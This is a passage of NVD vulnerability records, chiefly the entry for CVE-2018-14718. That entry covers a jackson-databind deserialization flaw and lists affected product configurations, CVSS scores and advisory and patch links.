"https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: 
"cve@mitre.org", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1106", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1107", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1108", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
"https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8%40%3Ccommits.pulsar.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", 
tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, ], sourceIdentifier: "cve@mitre.org", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-918", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "7036DA13-110D-40B3-8494-E361BBF4AFCD", versionEndExcluding: "2.6.7.3", versionStartIncluding: "2.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "B99066EB-FF79-4D9D-9466-B04AD4D3A814", versionEndExcluding: "2.7.9.5", versionStartIncluding: "2.7.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "F4D3858C-DAF3-4522-90EC-EFCD13BD121E", versionEndExcluding: "2.8.11.3", versionStartIncluding: "2.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", matchCriteriaId: "4DA01839-5250-43A7-AFB7-871DC9B8AB32", versionEndExcluding: "2.9.7", versionStartIncluding: "2.9.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", matchCriteriaId: "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", matchCriteriaId: "DEECE5FC-CACF-4496-A3E7-164736409252", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:banking_platform:2.5.0:*:*:*:*:*:*:*", matchCriteriaId: "35AD0C07-9688-4397-8D45-FBB88C0F0C11", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:*", matchCriteriaId: "8972497F-6E24-45A9-9A18-EB0E842CB1D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", matchCriteriaId: "400509A8-D6F2-432C-A2F1-AD5B8778D0D9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: 
"B887E174-57AB-449D-AEE4-82DD1A3E5C84", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "E869C417-C0E6-4FC3-B406-45598A1D1906", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:7.5:*:*:*:*:*:*:*", matchCriteriaId: "E6039DC7-08F2-4DD9-B5B5-B6B22DD2409F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0:*:*:*:*:*:*:*", matchCriteriaId: "7231AF76-3D46-41C4-83E9-6E9E12940BD9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "FD945A04-174C-46A2-935D-4F92631D1018", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.2:*:*:*:*:*:*:*", matchCriteriaId: "A9E97F04-00ED-48E9-AB40-7A02B3419641", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.2.3:*:*:*:*:*:*:*", matchCriteriaId: "FCCE5A11-39E7-4BBB-9E1A-BA4B754103BB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_virtualization:13.3.1:*:*:*:*:*:*:*", matchCriteriaId: "A5AEC7F5-C353-4CF5-96CE-8C713A2B0C92", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.2:*:*:*:*:*:*:*", matchCriteriaId: "BB79BB43-E0AB-4F0D-A6EA-000485757EEC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.3:*:*:*:*:*:*:*", matchCriteriaId: "F238CB66-886D-47E8-8DC0-7FC2025771EB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.4:*:*:*:*:*:*:*", matchCriteriaId: "59B7B8AD-1210-4C40-8EF7-E2E8156630A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.5:*:*:*:*:*:*:*", matchCriteriaId: "0DE4A291-4358-42A9-A68D-E59D9998A1CC", 
vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "0D19CF00-FE20-4690-AAB7-8E9DBC68A94F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "A030A498-3361-46F8-BB99-24A66CAE11CA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", versionEndExcluding: "11.2.0.3.23", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "BFD43191-E67F-4D1B-967B-3C7B20331945", versionEndExcluding: "12.2.0.1.19", versionStartIncluding: "12.2.0.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", matchCriteriaId: "062C588A-CBBA-470F-8D11-2F961922E927", versionEndExcluding: "13.9.4.2.1", versionStartIncluding: "13.9.4.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:9.2:*:*:*:*:*:*:*", matchCriteriaId: "989598A3-7012-4F57-B172-02404E20D16D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "042C243F-EDFE-4A04-AB0B-26E73CC34837", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:nosql_database:*:*:*:*:*:*:*:*", matchCriteriaId: "63C59FA7-F321-4475-9F71-D78E0C890866", versionEndExcluding: "19.3.12", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:nosql_database:19.3.12:*:*:*:*:*:*:*", matchCriteriaId: "9E215743-2B5D-4EA5-A8F5-BBEC4DC85C35", vulnerable: true, }, { 
criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:*:*:*:*:*:*:*:*", matchCriteriaId: "7A1E1023-2EB9-4334-9B74-CA71480F71C2", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.1:*:*:*:*:*:*:*", matchCriteriaId: "93A4E178-0082-45C5-BBC0-0A4E51C8B1DE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:15.2:*:*:*:*:*:*:*", matchCriteriaId: "3F021C23-AB9B-4877-833F-D01359A98762", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.1:*:*:*:*:*:*:*", matchCriteriaId: "2F8ED016-32A1-42EE-844E-3E6B2C116B74", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:16.2:*:*:*:*:*:*:*", matchCriteriaId: "A046CC2C-445F-4336-8810-930570B4FEC6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", matchCriteriaId: "0745445C-EC43-4091-BA7C-5105AFCC6F1F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", matchCriteriaId: "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25", vulnerable: true, }, { criteria: 
"cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", matchCriteriaId: "792DF04A-2D1B-40B5-B960-3E7152732EB8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_merchandising_system:16.0:*:*:*:*:*:*:*", matchCriteriaId: "46525CA6-4226-4F6F-B899-D800D4DDE0B5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9.0.0:*:*:*:*:*:*:*", matchCriteriaId: "9967AAFD-2199-4668-9105-207D4866B707", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_engineering_-_installer_\\&_deployment:*:*:*:*:*:*:*:*", matchCriteriaId: "25993ED6-D4C7-4B68-9F87-274B757A88CC", versionEndIncluding: "19.8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:*:*:*:*:*:*:*:*", matchCriteriaId: "2F10FB4D-A29B-42B4-B70E-EB82A93F2218", versionEndIncluding: "19.10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_portal:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D6A4F71A-4269-40FC-8F61-1D1301F2B728", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", matchCriteriaId: "5735E553-9731-4AAC-BCFF-989377F817B3", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", matchCriteriaId: "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", matchCriteriaId: "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "3A76E5BF-01E4-46E7-8E3B-5ACE75657360", versionEndExcluding: "3.11.153", versionStartIncluding: "3.11", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "E9A6D103-9674-4B04-8397-86501F1D91CF", versionEndExcluding: "4.6.26", 
versionStartIncluding: "4.6", vulnerable: true, }, { criteria: "cpe:2.3:a:redhat:openshift_container_platform:3.10:*:*:*:*:*:*:*", matchCriteriaId: "4DBCD38F-BBE8-488C-A8C3-5782F191D915", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:redhat:openshift_container_platform:*:*:*:*:*:*:*:*", matchCriteriaId: "D2452F48-6A8B-4274-B0CE-F1256F400170", versionEndExcluding: "4.1.18", versionStartIncluding: "4.1", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", matchCriteriaId: "142AD0DD-4CF3-4D74-9442-459CE3347E3A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, ], cveTags: [], descriptions: [ { lang: "en", value: "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization.", }, { lang: "es", value: "Las versiones 2.x de FasterXML jackson-databind anteriores a la 2.9.7 podrían permitir a los atacantes remotos ejecutar código arbitrario aprovechando que no se bloquea la clase slf4j-ext en la deserialización polimórfica.", }, ], id: "CVE-2018-14718", lastModified: "2024-11-21T03:49:39.707", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "HIGH", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", 
confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-01-02T18:29:00.310", references: [ { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/106601", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], 
url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "cve@mitre.org", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/6a78f88716c3c57aa74ec05764a37ab3874769a347805903b393b286%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/82b01bfb6787097427ce97cec6a7127e93718bc05d1efd5eaffc228f%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/ba973114605d936be276ee6ce09dfbdbf78aa56f6cdc6e79bfa7b8df%40%3Cdev.lucene.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", url: "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1%40%3Ccommits.druid.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html", }, { source: "cve@mitre.org", tags: [ "Mailing 
List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/68", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190530-0003/", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4452", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/106601", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:0959", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:0877", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1782", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party 
Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1797", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1822", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1823", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2804", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2858", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3140", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3149", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3892", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:4037", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson-databind/issues/2097", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Release Notes", "Third Party Advisory", ], url: "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: 
